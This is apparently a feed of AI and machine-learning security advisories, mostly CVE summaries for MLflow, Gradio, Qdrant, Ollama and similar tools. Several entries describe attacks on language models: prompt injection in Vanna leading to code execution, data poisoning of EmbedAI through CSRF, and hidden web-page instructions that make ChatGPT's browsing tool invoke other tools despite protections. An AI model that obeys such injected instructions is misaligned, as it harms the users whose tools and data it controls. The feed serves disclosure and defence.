All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
A workflow file (a set of automated tasks) in the Gradio project has a security flaw where it runs code from external copies of the repository without proper safety checks, allowing attackers to steal sensitive secrets (like API keys and authentication tokens). This happens because the workflow trusts and executes code from forks (unauthorized copies of the project) in an environment that has access to the main repository's secrets.
CVE-2024-37061 is a remote code execution vulnerability (the ability for an attacker to run commands on someone else's system) in MLflow (a machine learning platform) version 1.11.0 and newer. An attacker can create a malicious MLproject file that executes arbitrary code when a user runs it on their computer.
CVE-2024-37060 is a vulnerability in MLflow (a machine learning platform) version 1.27.0 and newer where deserialization of untrusted data (the process of converting received data back into usable objects without checking if it's safe) can occur. A malicious Recipe (a workflow template in MLflow) could exploit this to execute arbitrary code (run any commands) on a user's computer when the Recipe is run.
CVE-2024-37059 is a vulnerability in MLflow (a platform for managing machine learning workflows) version 0.5.0 and newer where deserialization of untrusted data (converting data from an external format into usable code without verifying it's safe) can occur. An attacker can upload a malicious PyTorch model (a type of machine learning model file) that executes arbitrary code (runs any commands they choose) on a user's computer when the model is opened or used.
CVE-2024-37058 is a vulnerability in MLflow (a platform for managing machine learning workflows) version 2.5.0 and newer that allows deserialization of untrusted data (the process of converting data from storage into usable objects without checking if it's safe). An attacker can upload a malicious Langchain AgentExecutor model (a type of AI component) that runs arbitrary code on a user's system when that user interacts with it.
CVE-2024-37057 is a vulnerability in MLflow (an open-source machine learning platform) versions 2.0.0rc0 and newer that allows deserialization of untrusted data (converting data from an untrusted source back into executable code). An attacker could upload a malicious TensorFlow model (a type of machine learning model) that runs arbitrary code (any commands an attacker chooses) on a user's computer when the model is loaded or used.
CVE-2024-37056 is a vulnerability in MLflow (a machine learning platform) version 1.23.0 and newer that allows deserialization of untrusted data (loading and executing code from data that hasn't been verified as safe). An attacker can upload a malicious LightGBM or scikit-learn model (machine learning libraries) that runs arbitrary code (any commands the attacker chooses) on a user's computer when the model is opened.
CVE-2024-37055 is a vulnerability in MLflow (a machine learning platform) versions 1.24.0 and newer where deserialization of untrusted data (the process of converting saved data back into usable objects without checking if it's safe) can occur. This allows an attacker to upload a malicious pmdarima model (a machine learning model for time-series forecasting) that runs arbitrary code (any commands the attacker chooses) on a user's computer when the model is loaded and used.
CVE-2024-37054 is a vulnerability in MLflow (a machine learning platform) version 0.9.0 and newer that allows deserialization of untrusted data (unsafe processing of data from untrusted sources). An attacker can upload a malicious PyFunc model (a machine learning model format) that runs arbitrary code (any commands an attacker wants) on a user's computer when the model is used.
CVE-2024-37053 is a vulnerability in MLflow (a machine learning platform) version 1.1.0 and newer where deserialization of untrusted data (the process of converting saved data back into usable code without checking if it's safe) can occur. An attacker can upload a malicious scikit-learn model (a machine learning library) that runs arbitrary code (any commands the attacker chooses) on a user's computer when the model is loaded and used.
CVE-2024-37052 is a vulnerability in MLflow (a machine learning platform) version 1.1.0 and newer where deserialization of untrusted data (converting data from an external format back into code without checking if it's safe) allows a malicious scikit-learn model (a machine learning library) to execute arbitrary code on a user's system when the model is loaded and used. This means an attacker could upload a harmful model that runs malicious commands when someone interacts with it.
CVE-2024-37065 is a vulnerability in skops (a Python library) version 0.6 and newer where deserialization (the process of converting saved data back into usable code) of untrusted data can occur, allowing a maliciously crafted model file to run arbitrary code on a user's computer when loaded.
A command injection vulnerability (a type of attack where specially crafted input tricks a system into running unintended commands) exists in the Gradio project's automated workflow file, where unsanitized (unfiltered) repository and branch names could be exploited to steal sensitive credentials like authentication tokens. The vulnerability affects Gradio versions up to @gradio/video@0.6.12.
Qdrant version 1.9.0-dev has a vulnerability in its snapshot recovery process (a feature that restores a database from a backup) that allows attackers to read and write arbitrary files on the server by inserting symlinks (shortcuts to other files) into snapshot files. This could potentially give attackers complete control over the system.
The Vanna library (a tool for generating data visualizations) has a vulnerability where attackers can use prompt injection (tricking an AI by hiding instructions in its input) to alter how the library processes user requests and run arbitrary Python code instead of creating the intended visualization. This happens when external input is sent to the library's 'ask' method with visualization enabled, which is the default setting, leading to remote code execution (attackers being able to run commands on a system they don't own).
A code injection vulnerability (injecting malicious code into a system) exists in the huggingface/text-generation-inference repository's workflow file, where user input from GitHub branch names is unsafely used to build commands. An attacker can exploit this by creating a malicious branch name and submitting a pull request, potentially executing arbitrary code on the GitHub Actions runner (the automated system that runs tests and builds for the project).
Qdrant version 1.9.0-dev has a path traversal vulnerability (a security flaw where an attacker manipulates file paths to access unintended locations) in its snapshot upload endpoint that allows attackers to write files anywhere on the server by encoding special characters in the request. This could lead to complete system compromise through arbitrary file upload and overwriting.
EmbedAI has a security flaw that allows data poisoning attacks (injecting false or harmful information into an AI system) through a CSRF vulnerability (cross-site request forgery, where an attacker tricks a user into performing unwanted actions on a website they're logged into). An attacker can direct users to a malicious webpage that exploits weak session management and CORS policies (which control what external websites can access the application), tricking them into uploading bad data that corrupts the application's language model.
Fix: Update to version v1.9.0, where the issue is fixed.
NVD/CVE DatabaseOllama versions before 0.1.34 have a security flaw where they don't properly check the format of digests (sha256 hashes that should be exactly 64 hexadecimal digits) when looking up model file paths. This allows attackers to bypass security checks by using invalid digest formats, such as ones with too few digits, too many digits, or paths starting with '../' (a path traversal technique that accesses files outside the intended directory).
Fix: Update Ollama to version 0.1.34 or later. The fix is available in the release notes at https://github.com/ollama/ollama/compare/v0.1.33...v0.1.34 and was implemented in pull request #4175.
NVD/CVE DatabaseFix: This issue was fixed in version 2.0.0. Users should update to version 2.0.0 or later.
NVD/CVE DatabaseFix: The issue is fixed in version 1.9.0. Users should upgrade to this version or later.
NVD/CVE DatabaseChatGPT's browsing tool can be tricked into automatically invoking other tools (like image creation or memory management) when users visit websites containing hidden instructions, a vulnerability known as prompt injection (tricking an AI by hiding instructions in its input). While OpenAI added some protections, minor prompting tricks can bypass them, and this issue affects other AI applications as well.
Fix: For custom GPTs with AI Actions, creators can use the x-openai-isConsequential flag as a mitigation to put users in control, though the source notes this approach 'still lacks a great user experience, like better visualization to understand what the action is about to do.'
Embrace The Red